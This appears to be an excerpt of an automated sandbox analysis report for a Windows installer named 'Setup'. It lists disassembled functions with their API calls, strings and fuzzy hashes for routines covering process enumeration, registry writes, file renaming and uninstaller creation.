                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                  • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                  • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                  • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                  Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                  • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                  • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                  • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                  Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                    • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                  Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                  • String ID: F$N$open
                                                                                                                                  • API String ID: 3928313111-1104729357
                                                                                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                  Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                  • API String ID: 565278875-3368763019
                                                                                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  Strings
                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                  Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                  • API String ID: 3734993849-3206598305
                                                                                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                  Strings
                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                  Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
